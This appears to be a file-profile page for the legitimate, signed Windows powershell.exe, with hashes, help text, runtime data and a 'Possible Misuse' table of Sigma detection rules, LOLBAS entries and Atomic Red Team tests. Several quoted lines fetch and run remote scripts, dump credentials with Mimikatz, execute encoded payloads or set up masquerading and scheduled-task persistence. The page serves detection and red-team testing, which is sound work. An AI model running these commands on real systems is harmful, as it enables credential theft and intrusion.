powershell.exe

  • File Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  • Description: Windows PowerShell

Hashes

Type Hash
MD5 5B16D54F2AE6B74DCF863BC0F5E502B5
SHA1 900978683159718D65305D72A57634F043A325F9
SHA256 FCC434CC413E969DE19D329CA4E15CA567DA5DAA1F7E265D96EAF6E3D9D8B2CB
SHA384 372D7B1E716707FBAD1972508A68544911987D1041D15DF190628089993367DACB66DA1B23C14F94B9532B801CF1BED5
SHA512 46AA81FC07EA1EBE60B01B9835F6F09CE51F41AF7D685DF4855192B611E3F4946C847ADFAE4CF03B9418BB97F506E0D85D2A93C7F954A017A13DB8960891366D
SSDEEP 6144:tF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:c5pGVcwW2KXzJ4pdd3klnnWosPhnzq
IMP 194427A488ED1DD0A91731658B071667
PESHA1 D3A5FD76C8FD50C44428569EF5D9AED762755C5D
PE256 97013EA3A38894E49FB786E825D1767B7EDD81F10C147E6402680161C7A98618

Runtime Data

Usage (stdout):


PowerShell[.exe] [-PSConsoleFile <file> | -Version <version>]
    [-NoLogo] [-NoExit] [-Sta] [-Mta] [-NoProfile] [-NonInteractive]
    [-InputFormat {Text | XML}] [-OutputFormat {Text | XML}]
    [-WindowStyle <style>] [-EncodedCommand <Base64EncodedCommand>]
    [-ConfigurationName <string>]
    [-File <filePath> <args>] [-ExecutionPolicy <ExecutionPolicy>]
    [-Command { - | <script-block> [-args <arg-array>]
                  | <string> [<CommandParameters>] } ]

PowerShell[.exe] -Help | -? | /?

-PSConsoleFile
    Loads the specified Windows PowerShell console file. To create a console
    file, use Export-Console in Windows PowerShell.

-Version
    Starts the specified version of Windows PowerShell. 
    Enter a version number with the parameter, such as "-version 2.0".

-NoLogo
    Hides the copyright banner at startup.

-NoExit
    Does not exit after running startup commands.

-Sta
    Starts the shell using a single-threaded apartment.
    Single-threaded apartment (STA) is the default.

-Mta
    Start the shell using a multithreaded apartment.

-NoProfile
    Does not load the Windows PowerShell profile.

-NonInteractive
    Does not present an interactive prompt to the user.

-InputFormat
    Describes the format of data sent to Windows PowerShell. Valid values are
    "Text" (text strings) or "XML" (serialized CLIXML format).

-OutputFormat
    Determines how output from Windows PowerShell is formatted. Valid values
    are "Text" (text strings) or "XML" (serialized CLIXML format).

-WindowStyle
    Sets the window style to Normal, Minimized, Maximized or Hidden.

-EncodedCommand
    Accepts a base-64-encoded string version of a command. Use this parameter 
    to submit commands to Windows PowerShell that require complex quotation 
    marks or curly braces.

-ConfigurationName
    Specifies a configuration endpoint in which Windows PowerShell is run.
    This can be any endpoint registered on the local machine including the
    default Windows PowerShell remoting endpoints or a custom endpoint having
    specific user role capabilities.
    
-File
    Runs the specified script in the local scope ("dot-sourced"), so that the 
    functions and variables that the script creates are available in the 
    current session. Enter the script file path and any parameters. 
    File must be the last parameter in the command, because all characters 
    typed after the File parameter name are interpreted 
    as the script file path followed by the script parameters.

-ExecutionPolicy
    Sets the default execution policy for the current session and saves it 
    in the $env:PSExecutionPolicyPreference environment variable. 
    This parameter does not change the Windows PowerShell execution policy 
    that is set in the registry.

-Command
    Executes the specified commands (and any parameters) as though they were
    typed at the Windows PowerShell command prompt, and then exits, unless 
    NoExit is specified. The value of Command can be "-", a string. or a
    script block.

    If the value of Command is "-", the command text is read from standard
    input.

    If the value of Command is a script block, the script block must be enclosed
    in braces ({}). You can specify a script block only when running PowerShell.exe
    in Windows PowerShell. The results of the script block are returned to the
    parent shell as deserialized XML objects, not live objects.

    If the value of Command is a string, Command must be the last parameter
    in the command , because any characters typed after the command are 
    interpreted as the command arguments.

    To write a string that runs a Windows PowerShell command, use the format:
	"& {<command>}"
    where the quotation marks indicate a string and the invoke operator (&)
    causes the command to be executed.

-Help, -?, /?
    Shows this message. If you are typing a PowerShell.exe command in Windows
    PowerShell, prepend the command parameters with a hyphen (-), not a forward
    slash (/). You can use either a hyphen or forward slash in Cmd.exe.

EXAMPLES
    PowerShell -PSConsoleFile SqlSnapIn.Psc1
    PowerShell -version 2.0 -NoLogo -InputFormat text -OutputFormat XML
    PowerShell -ConfigurationName AdminRoles
    PowerShell -Command {Get-EventLog -LogName security}
    PowerShell -Command "& {Get-EventLog -LogName security}"

    # To use the -EncodedCommand parameter:
    $command = 'dir "c:\program files" '
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
    $encodedCommand = [Convert]::ToBase64String($bytes)
    powershell.exe -encodedCommand $encodedCommand

Child Processes:

conhost.exe

Open Handles:

Path Type
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll File
(R-D) C:\Windows\System32\en-US\crypt32.dll.mui File
(R-D) C:\Windows\System32\en-US\winnlsres.dll.mui File
(R-D) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\powershell.exe.mui File
(RW-) C:\Users\user\Documents File
(RW-) C:\Windows File
...\Cor_SxSPublic_IPCBlock Section
\BaseNamedObjects__ComCatalogCache__ Section
\BaseNamedObjects\Cor_Private_IPCBlock_v4_4356 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\1\BaseNamedObjects\windows_shell_global_counters Section

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: PowerShell.EXE.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/66
  • VirusTotal Link: https://www.virustotal.com/gui/file/fcc434cc413e969de19d329ca4e15ca567da5daa1f7e265d96eaf6e3d9d8b2cb/detection/

File Similarity (ssdeep match)

File Score
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 82
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 86
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe 83
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 86
C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe 74
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe 83
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 83
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 85
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 86
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 85
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 85
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 99
C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 72

Possible Misuse

The following table contains possible examples of powershell.exe being misused. While powershell.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\powershell.exe' DRL 1.0
sigma win_powershell_snapins_hafnium.yml Image: '*\powershell.exe' DRL 1.0
sigma win_bits_client_susp_powershell_job.yml processPath|endswith: '\powershell.exe' DRL 1.0
sigma win_asr_bypass_via_appvlp_re.yml CommandLine|re: '(?i).*appvlp.exe.*(cmd.exe|powershell.exe).*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.msh|.reg|.scr|.ps|.vb|.jar|.pl|.inf)' DRL 1.0
sigma win_susp_logon_explicit_credentials.yml - '\powershell.exe' DRL 1.0
sigma sysmon_powershell_code_injection.yml SourceImage|endswith: '\powershell.exe' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\powershell.exe' DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml SourceImage|endswith: '\powershell.exe' DRL 1.0
sigma win_susp_rclone_exec.yml - '\PowerShell.exe' DRL 1.0
sigma file_event_win_creation_system_file.yml - '\powershell.exe' DRL 1.0
sigma file_event_win_detect_powerup_dllhijacking.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma file_event_win_macro_file.yml - \powershell.exe DRL 1.0
sigma file_event_win_powershell_startup_shortcuts.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma file_event_win_susp_adsi_cache_usage.yml - 'C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe' DRL 1.0
sigma file_event_win_susp_ntds_dit.yml - '\powershell.exe' DRL 1.0
sigma file_event_win_win_shell_write_susp_directory.yml - '\powershell.exe' DRL 1.0
sigma image_load_alternate_powershell_hosts_moduleload.yml description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe DRL 1.0
sigma image_load_alternate_powershell_hosts_moduleload.yml - '\powershell.exe' DRL 1.0
sigma image_load_in_memory_powershell.yml description: Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. Detects meterpreter's "load powershell" extension. DRL 1.0
sigma image_load_in_memory_powershell.yml - '\powershell.exe' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml # - '\powershell.exe' triggered by installing common software DRL 1.0
sigma image_load_wsman_provider_image_load.yml - '\powershell.exe' DRL 1.0
sigma net_connection_win_powershell_network_connection.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma pipe_created_alternate_powershell_hosts_pipe.yml description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe DRL 1.0
sigma pipe_created_alternate_powershell_hosts_pipe.yml - '\powershell.exe' DRL 1.0
sigma posh_pc_alternate_powershell_hosts.yml description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe DRL 1.0
sigma posh_pc_alternate_powershell_hosts.yml - HostApplication|startswith: 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe' DRL 1.0
sigma posh_pc_renamed_powershell.yml - powershell.exe DRL 1.0
sigma posh_pc_renamed_powershell.yml - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe DRL 1.0
sigma posh_pc_wsman_com_provider_no_powershell.yml description: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application. DRL 1.0
sigma posh_pm_alternate_powershell_hosts.yml description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe DRL 1.0
sigma posh_pm_alternate_powershell_hosts.yml ContextInfo|contains: 'powershell.exe' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event DRL 1.0
sigma proc_creation_win_abusing_debug_privilege.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_apt_babyshark.yml - powershell.exe mshta.exe http* DRL 1.0
sigma proc_creation_win_apt_muddywater_dnstunnel.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_apt_wocao.yml - 'cmd /c powershell.exe -ep bypass -file c:\s.ps1' DRL 1.0
sigma proc_creation_win_dnscat2_powershell_implementation.yml ParentImage|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_exploit_cve_2020_10189.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_html_help_spawn.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_mmc_spawn_shell.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_multiple_suspicious_cli.yml - powershell.exe DRL 1.0
sigma proc_creation_win_new_service_creation.yml - Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_non_interactive_powershell.yml description: Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent. DRL 1.0
sigma proc_creation_win_non_interactive_powershell.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_bitsjob.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_cmdline_reversed_strings.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_cmdline_special_characters.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_cmdline_specific_comb_methods.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_disable_windef_av.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_downgrade_attack.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_download.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_reverse_shell_connection.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_suspicious_parameter_variation.yml - '\Powershell.exe' DRL 1.0
sigma proc_creation_win_powersploit_empire_schtasks.yml ParentImage|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_remote_time_discovery.yml - Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'powershell.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'powershell.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_renamed_powershell.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_run_powershell_script_from_ads.yml ParentImage|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_run_powershell_script_from_ads.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_run_powershell_script_from_input_stream.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_screenconnect_anomaly.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_shadow_copies_creation.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_shadow_copies_deletion.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_mshta.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_susp_program.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_bitstransfer.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_crackmapexec_execution.yml - 'powershell.exe -exec bypass -noni -nop -w 1 -C "' DRL 1.0
sigma proc_creation_win_susp_crackmapexec_execution.yml - 'powershell.exe -noni -nop -w 1 -enc ' DRL 1.0
sigma proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml CommandLine|contains: 'powershell.exe' DRL 1.0
sigma proc_creation_win_susp_eventlog_clear.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_pester.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_powershell_encode.yml Image|endswith: \powershell.exe DRL 1.0
sigma proc_creation_win_susp_powershell_hidden_b64_cmd.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_powershell_parent_combo.yml Image|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_powershell_parent_process.yml description: Detects suspicious parents of powershell.exe DRL 1.0
sigma proc_creation_win_susp_ps_appdata.yml - 'powershell.exe' DRL 1.0
sigma proc_creation_win_susp_rclone_execution.yml - '\PowerShell.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml ParentImage|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - 'powershell.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_temp.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_from_mssql.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_from_winrm.yml - '*\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_spoolsv_child_processes.yml Image|endswith: \powershell.exe DRL 1.0
sigma proc_creation_win_susp_use_of_csharp_console.yml ParentImage|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_whoami_anomaly.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_system_exe_anomaly.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_vmtoolsd_susp_child_process.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_webshell_spawn.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_wmi_spwns_powershell.yml - '\powershell.exe' DRL 1.0
sigma sysmon_accessing_winapi_in_powershell_credentials_dumping.yml SourceImage|endswith: '\powershell.exe' DRL 1.0
sigma sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml - '\powershell.exe' DRL 1.0
LOLBAS Powershell.yml Name: Powershell.exe  
LOLBAS Powershell.yml - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  
LOLBAS Powershell.yml - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  
LOLBAS CL_LoadAssembly.yml - Command: '"powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'
LOLBAS UtilityFunctions.yml - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"'
LOLBAS Agentexecutor.yml Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument  
LOLBAS Agentexecutor.yml Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully  
LOLBAS Appvlp.yml - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"  
LOLBAS Appvlp.yml Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.  
LOLBAS Appvlp.yml - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"  
LOLBAS Mftrace.yml - Command: Mftrace.exe powershell.exe  
LOLBAS Mftrace.yml Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.  
LOLBAS Remote.yml - Command: Remote.exe /s "powershell.exe" anythinghere  
malware-ioc misp-dukes-operation-ghost-event.json "description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.\n\n### Windows\nThere are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>. (Citation: PowerShell About 2019)\n\n### Mac\nThe configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)\n", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via Spearphishing Attachment with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via Spearphishing Link that leads to exploitation of a browser or application vulnerability via Exploitation for Client Execution. While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.\n\nDetection: Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate\/Decode Files or Information in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: Anti-virus, Process command-line parameters, Process monitoring\n\nPermissions Required: User", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.\n\nDetection: Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: File monitoring, Packet capture, Mail server, Network intrusion detection system, Detonation chamber, Email gateway", © ESET 2014-2018
atomic-red-team index.md - Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1027.md powershell.exe -EncodedCommand $EncodedCommand MIT License. © 2018 Red Canary
atomic-red-team T1027.md powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))" MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md - Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md ## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.doc.ps1 MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.pdf.ps1 MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.rtf.ps1 MIT License. © 2018 Red Canary
atomic-red-team T1036.004.md schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f MIT License. © 2018 Red Canary
atomic-red-team T1049.md Upon successful execution, powershell.exe will execute get-NetTCPConnection. Results will output via stdout. MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min "" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\ATOMIC-T1053.005).test)))" /sc daily /st #{time} MIT License. © 2018 Red Canary
atomic-red-team T1055.001.md Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'" MIT License. © 2018 Red Canary
